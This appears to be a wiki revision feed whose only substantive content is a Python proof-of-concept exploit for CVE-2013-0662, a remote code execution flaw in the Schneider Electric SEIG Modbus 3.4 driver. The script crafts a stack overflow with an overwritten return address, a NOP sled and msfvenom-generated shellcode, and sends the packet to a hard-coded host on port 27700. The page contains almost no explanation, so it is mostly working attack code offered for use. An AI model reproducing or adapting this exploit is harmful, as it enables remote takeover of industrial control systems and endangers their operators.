https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2013-0662_SEIG_Modbus_3.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2013-0662 SEIG Modbus 3.4 遠程代碼執行漏洞 - Revision history
2026-04-14T14:23:28Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2013-0662_SEIG_Modbus_3.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1513&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Title: SEIG Modbus 3.4 - Remote Code Execution # Author: Alejandro Parodi # Date: 2018-08-17 # Vendor Homepage: https://www.schneider-electric.com # Software L..."
2021-04-11T01:27:22Z
<p>Created page with "==EXP== <pre> # Title: SEIG Modbus 3.4 - Remote Code Execution # Author: Alejandro Parodi # Date: 2018-08-17 # Vendor Homepage: https://www.schneider-electric.com # Software L..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Title: SEIG Modbus 3.4 - Remote Code Execution<br />
# Author: Alejandro Parodi<br />
# Date: 2018-08-17<br />
# Vendor Homepage: https://www.schneider-electric.com<br />
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4<br />
# Version: v3.4<br />
# Tested on: Windows XP SP3<br />
# CVE: CVE-2013-0662<br />
# References:<br />
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662<br />
<br />
import socket<br />
import struct<br />
<br />
ip = "192.168.127.138"<br />
port = 27700<br />
con = (ip, port)<br />
<br />
<br />
####### MESSAGE ##########<br />
message_header = "\x00\x64"<br />
message_buffer = "A" * 0x5dc<br />
eip = struct.pack("<I", 0x7C9C167D)<br />
<br />
# Shellcode generated with:<br />
# msfvenom -a x86 --platform windows -p windows/exec cmd=calc -e x86/xor_call4 -f python<br />
# Shellcode Size: 189 bytes<br />
nopsleed = "\x90" * 100 # \x90 bad char bypass<br />
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"<br />
shellcode += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"<br />
shellcode += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"<br />
shellcode += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"<br />
shellcode += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"<br />
shellcode += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"<br />
shellcode += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"<br />
shellcode += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"<br />
shellcode += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"<br />
shellcode += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"<br />
shellcode += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"<br />
shellcode += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"<br />
shellcode += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"<br />
shellcode += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"<br />
shellcode += "\xff\xd5\x63\x61\x6c\x63\x00"<br />
<br />
message = message_header + message_buffer + eip + nopsleed + shellcode<br />
print "Message Len: " + hex(len(message)) + " bytes"<br />
##########################<br />
<br />
######## PKG HEADER ######<br />
header_padding = "\x42\x42"<br />
header_buf_size = "\xFF\xFF"<br />
header_recv_len = struct.pack(">H", len(message))<br />
header_end = "\x44"<br />
<br />
header = header_padding + header_buf_size + header_recv_len + header_end<br />
##########################<br />
<br />
######## CRAFTING PAYLOAD ########<br />
payload = header + message<br />
print "Package Len: "+hex(len(payload)) + " bytes"<br />
##################################<br />
<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
s.connect(con)<br />
s.send(payload)<br />
</pre></div>
Pwnwiki